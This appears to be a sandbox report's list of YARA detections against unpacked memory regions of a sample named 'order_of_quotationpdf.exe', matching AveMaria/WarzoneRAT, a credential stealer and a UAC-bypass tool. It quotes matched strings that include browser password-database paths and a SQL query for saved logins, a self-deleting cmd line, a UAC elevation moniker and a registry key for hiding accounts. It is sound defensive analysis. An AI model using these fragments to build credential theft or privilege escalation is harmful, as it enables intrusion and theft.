3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x27ae0:$a1: \Opera Software\Opera Stable\Login Data 0x27de0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x275d8:$a3: \Google\Chrome\User Data\Default\Login Data
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x29e55:$r1: Classes\Folder\shell\open\command 0x29eb9:$r1: Classes\Folder\shell\open\command 0x29f0d:$r1: Classes\Folder\shell\open\command 0x29f85:$r1: Classes\Folder\shell\open\command 0x29edc:$k1: DelegateExecute
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x2a114:$pwsh: powershell 0x2693b:$s2: User-Agent: 0x26c7c:$s4: LdrLoadDll 0x29908:$s4: LdrLoadDll 0x264c4:$v6: start
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x29d48:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x285ac:$a2: SMTP Password 0x27178:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x29c38:$a5: for /F "usebackq tokens=*" %%A in (" 0x27e38:$a6: \Torch\User Data\Default\Login Data 0x28384:$a10: \logins.json 0x2848c:$a10: \logins.json 0x28d70:$a11: Accounts\Account.rec0 0x29a00:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
3.2.order_of_quotationpdf.exe.400000.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x29d48:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x299e4:$str2: MsgBox.exe 0x29e24:$str4: \System32\cmd.exe 0x29a00:$str6: Ave_Maria 0x28f98:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x285ac:$str8: SMTP Password 0x275d8:$str11: \Google\Chrome\User Data\Default\Login Data 0x28f44:$str12: \sqlmap.dll 0x28f5c:$str12: \sqlmap.dll
3.3.order_of_quotationpdf.exe.728de8.5.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c1f0:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x266e0:$a1: \Opera Software\Opera Stable\Login Data 0x269e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x261d8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x28a55:$r1: Classes\Folder\shell\open\command 0x28ab9:$r1: Classes\Folder\shell\open\command 0x28b0d:$r1: Classes\Folder\shell\open\command 0x28b85:$r1: Classes\Folder\shell\open\command 0x28adc:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x28014:$s1: RDPClip 0x28cf4:$s2: Grabber 0x28d04:$s2: Grabber 0x28600:$s3: Ave_Maria Stealer OpenSource 0x285b8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2c310:$s6: /n:%temp%\ellocnak.xml 0x2c340:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x28d14:$pwsh: powershell 0x2553b:$s2: User-Agent: 0x2587c:$s4: LdrLoadDll 0x28508:$s4: LdrLoadDll 0x250c4:$v6: start
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x28948:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x271ac:$a2: SMTP Password 0x25d78:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2c1f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x28838:$a5: for /F "usebackq tokens=*" %%A in (" 0x26a38:$a6: \Torch\User Data\Default\Login Data 0x2c310:$a7: /n:%temp%\ellocnak.xml 0x2c340:$a9: Hey I'm Admin 0x26f84:$a10: \logins.json 0x2708c:$a10: \logins.json 0x27970:$a11: Accounts\Account.rec0 0x28600:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x28948:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x285e4:$str2: MsgBox.exe 0x28a24:$str4: \System32\cmd.exe 0x28600:$str6: Ave_Maria 0x27b98:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x271ac:$str8: SMTP Password 0x261d8:$str11: \Google\Chrome\User Data\Default\Login Data 0x27b44:$str12: \sqlmap.dll 0x27b5c:$str12: \sqlmap.dll 0x2c1f0:$str16: Elevation:Administrator!new 0x2c310:$str17: /n:%temp%
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0xf270:$a1: \Opera Software\Opera Stable\Login Data 0xf570:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xed68:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0xfd3c:$a2: SMTP Password 0xe908:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xf5c8:$a6: \Torch\User Data\Default\Login Data 0xea0:$a7: /n:%temp%\ellocnak.xml 0xed0:$a9: Hey I'm Admin 0xfb14:$a10: \logins.json 0xfc1c:$a10: \logins.json 0x10500:$a11: Accounts\Account.rec0
0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x10728:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0xfd3c:$str8: SMTP Password 0xed68:$str11: \Google\Chrome\User Data\Default\Login Data 0x106d4:$str12: \sqlmap.dll 0x106ec:$str12: \sqlmap.dll 0xd80:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp%
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c1f0:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x266e0:$a1: \Opera Software\Opera Stable\Login Data 0x269e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x261d8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x28a55:$r1: Classes\Folder\shell\open\command 0x28ab9:$r1: Classes\Folder\shell\open\command 0x28b0d:$r1: Classes\Folder\shell\open\command 0x28b85:$r1: Classes\Folder\shell\open\command 0x28adc:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x28014:$s1: RDPClip 0x28cf4:$s2: Grabber 0x28d04:$s2: Grabber 0x28600:$s3: Ave_Maria Stealer OpenSource 0x285b8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2c310:$s6: /n:%temp%\ellocnak.xml 0x2c340:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x28d14:$pwsh: powershell 0x2553b:$s2: User-Agent: 0x2587c:$s4: LdrLoadDll 0x28508:$s4: LdrLoadDll 0x250c4:$v6: start
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x28948:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x271ac:$a2: SMTP Password 0x25d78:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2c1f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x28838:$a5: for /F "usebackq tokens=*" %%A in (" 0x26a38:$a6: \Torch\User Data\Default\Login Data 0x2c310:$a7: /n:%temp%\ellocnak.xml 0x2c340:$a9: Hey I'm Admin 0x26f84:$a10: \logins.json 0x2708c:$a10: \logins.json 0x27970:$a11: Accounts\Account.rec0 0x28600:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack	AveMaria_WarZone	unknown	unknown	0x28948:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x285e4:$str2: MsgBox.exe 0x28a24:$str4: \System32\cmd.exe 0x28600:$str6: Ave_Maria 0x27b98:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x271ac:$str8: SMTP Password 0x261d8:$str11: \Google\Chrome\User Data\Default\Login Data 0x27b44:$str12: \sqlmap.dll 0x27b5c:$str12: \sqlmap.dll 0x2c1f0:$str16: Elevation:Administrator!new 0x2c310:$str17: /n:%temp%
0.2.order_of_quotationpdf.exe.4749510.10.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2a9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.4749510.10.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2a9f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2a9f0:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.4749510.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x252e0:$a1: \Opera Software\Opera Stable\Login Data 0x255e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x24dd8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.4749510.10.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.4749510.10.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x27655:$r1: Classes\Folder\shell\open\command 0x276b9:$r1: Classes\Folder\shell\open\command 0x2770d:$r1: Classes\Folder\shell\open\command 0x27785:$r1: Classes\Folder\shell\open\command 0x276dc:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.4749510.10.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x26c14:$s1: RDPClip 0x278f4:$s2: Grabber 0x27904:$s2: Grabber 0x27200:$s3: Ave_Maria Stealer OpenSource 0x271b8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2ab10:$s6: /n:%temp%\ellocnak.xml 0x2ab40:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.4749510.10.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x27914:$pwsh: powershell 0x2493b:$s2: User-Agent: 0x27108:$s4: LdrLoadDll 0x244c4:$v6: start
0.2.order_of_quotationpdf.exe.4749510.10.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x27548:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x25dac:$a2: SMTP Password 0x2a9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x27438:$a5: for /F "usebackq tokens=*" %%A in (" 0x25638:$a6: \Torch\User Data\Default\Login Data 0x2ab10:$a7: /n:%temp%\ellocnak.xml 0x2ab40:$a9: Hey I'm Admin 0x25b84:$a10: \logins.json 0x25c8c:$a10: \logins.json 0x26570:$a11: Accounts\Account.rec0 0x27200:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.4749510.10.unpack	AveMaria_WarZone	unknown	unknown	0x27548:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x271e4:$str2: MsgBox.exe 0x27624:$str4: \System32\cmd.exe 0x27200:$str6: Ave_Maria 0x26798:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x25dac:$str8: SMTP Password 0x24dd8:$str11: \Google\Chrome\User Data\Default\Login Data 0x26744:$str12: \sqlmap.dll 0x2675c:$str12: \sqlmap.dll 0x2a9f0:$str16: Elevation:Administrator!new 0x2ab10:$str17: /n:%temp%
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3b88:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3b88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new: 0x3b88:$c1: Elevation:Administrator!new:
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x12140:$a1: \Opera Software\Opera Stable\Login Data 0x12440:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11c38:$a3: \Google\Chrome\User Data\Default\Login Data
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x144b5:$r1: Classes\Folder\shell\open\command 0x14519:$r1: Classes\Folder\shell\open\command 0x1456d:$r1: Classes\Folder\shell\open\command 0x145e5:$r1: Classes\Folder\shell\open\command 0x1453c:$k1: DelegateExecute
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x13a74:$s1: RDPClip 0x14754:$s2: Grabber 0x14764:$s2: Grabber 0x14060:$s3: Ave_Maria Stealer OpenSource 0x14018:$s4: \MidgetPorn\workspace\MsgBox.exe 0xea0:$s6: /n:%temp%\ellocnak.xml 0x3ca8:$s6: /n:%temp%\ellocnak.xml 0xed0:$s7: Hey I'm Admin 0x3cd8:$s7: Hey I'm Admin
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x14774:$pwsh: powershell 0x10f9b:$s2: User-Agent: 0x16ba3:$s2: User-Agent: 0x112dc:$s4: LdrLoadDll 0x13f68:$s4: LdrLoadDll 0x16ee4:$s4: LdrLoadDll 0x10b24:$v6: start 0x1672c:$v6: start
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x143a8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12c0c:$a2: SMTP Password 0x117d8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3b88:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x14298:$a5: for /F "usebackq tokens=*" %%A in (" 0x12498:$a6: \Torch\User Data\Default\Login Data 0xea0:$a7: /n:%temp%\ellocnak.xml 0x3ca8:$a7: /n:%temp%\ellocnak.xml 0xed0:$a9: Hey I'm Admin 0x3cd8:$a9: Hey I'm Admin 0x129e4:$a10: \logins.json 0x12aec:$a10: \logins.json 0x133d0:$a11: Accounts\Account.rec0 0x14060:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x143a8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14044:$str2: MsgBox.exe 0x14484:$str4: \System32\cmd.exe 0x14060:$str6: Ave_Maria 0x135f8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x12c0c:$str8: SMTP Password 0x11c38:$str11: \Google\Chrome\User Data\Default\Login Data 0x135a4:$str12: \sqlmap.dll 0x135bc:$str12: \sqlmap.dll 0xd80:$str16: Elevation:Administrator!new 0x3b88:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp% 0x3ca8:$str17: /n:%temp%
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2318:$c1: Elevation:Administrator!new:
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x108d0:$a1: \Opera Software\Opera Stable\Login Data 0x10bd0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x103c8:$a3: \Google\Chrome\User Data\Default\Login Data
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x12c45:$r1: Classes\Folder\shell\open\command 0x12ca9:$r1: Classes\Folder\shell\open\command 0x12cfd:$r1: Classes\Folder\shell\open\command 0x12d75:$r1: Classes\Folder\shell\open\command 0x12ccc:$k1: DelegateExecute
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x12204:$s1: RDPClip 0x12ee4:$s2: Grabber 0x12ef4:$s2: Grabber 0x127f0:$s3: Ave_Maria Stealer OpenSource 0x127a8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2438:$s6: /n:%temp%\ellocnak.xml 0x2468:$s7: Hey I'm Admin
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x12f04:$pwsh: powershell 0xf72b:$s2: User-Agent: 0x15333:$s2: User-Agent: 0xfa6c:$s4: LdrLoadDll 0x126f8:$s4: LdrLoadDll 0x15674:$s4: LdrLoadDll 0xf2b4:$v6: start 0x14ebc:$v6: start
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x12b38:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1139c:$a2: SMTP Password 0xff68:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2318:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x12a28:$a5: for /F "usebackq tokens=*" %%A in (" 0x10c28:$a6: \Torch\User Data\Default\Login Data 0x2438:$a7: /n:%temp%\ellocnak.xml 0x2468:$a9: Hey I'm Admin 0x11174:$a10: \logins.json 0x1127c:$a10: \logins.json 0x11b60:$a11: Accounts\Account.rec0 0x127f0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
3.3.order_of_quotationpdf.exe.718718.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x12b38:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x127d4:$str2: MsgBox.exe 0x12c14:$str4: \System32\cmd.exe 0x127f0:$str6: Ave_Maria 0x11d88:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1139c:$str8: SMTP Password 0x103c8:$str11: \Google\Chrome\User Data\Default\Login Data 0x11d34:$str12: \sqlmap.dll 0x11d4c:$str12: \sqlmap.dll 0x2318:$str16: Elevation:Administrator!new 0x2438:$str17: /n:%temp%
3.3.order_of_quotationpdf.exe.727100.3.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.3.order_of_quotationpdf.exe.727100.3.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x365d:$r1: Classes\Folder\shell\open\command 0x36c1:$r1: Classes\Folder\shell\open\command 0x3715:$r1: Classes\Folder\shell\open\command 0x378d:$r1: Classes\Folder\shell\open\command 0x36e4:$k1: DelegateExecute
3.3.order_of_quotationpdf.exe.727100.3.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x391c:$pwsh: powershell 0x5d4b:$s2: User-Agent: 0x3110:$s4: LdrLoadDll 0x608c:$s4: LdrLoadDll 0x58d4:$v6: start
3.3.order_of_quotationpdf.exe.727100.3.unpack	AveMaria_WarZone	unknown	unknown	0x3550:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x31ec:$str2: MsgBox.exe 0x362c:$str4: \System32\cmd.exe 0x3208:$str6: Ave_Maria 0x27a0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x274c:$str12: \sqlmap.dll 0x2764:$str12: \sqlmap.dll
0.2.order_of_quotationpdf.exe.70a0000.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x9704:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x9704:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x9704:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x17bf4:$a1: \Opera Software\Opera Stable\Login Data 0x17ef4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x176ec:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x5f69:$r1: Classes\Folder\shell\open\command 0x5fcd:$r1: Classes\Folder\shell\open\command 0x6021:$r1: Classes\Folder\shell\open\command 0x6099:$r1: Classes\Folder\shell\open\command 0x5ff0:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x5528:$s1: RDPClip 0x6208:$s2: Grabber 0x6218:$s2: Grabber 0x5b14:$s3: Ave_Maria Stealer OpenSource 0x5acc:$s4: \MidgetPorn\workspace\MsgBox.exe 0x9824:$s6: /n:%temp%\ellocnak.xml 0x9854:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x6228:$pwsh: powershell 0x16a4f:$s2: User-Agent: 0x5a1c:$s4: LdrLoadDll 0x16d90:$s4: LdrLoadDll 0x165d8:$v6: start
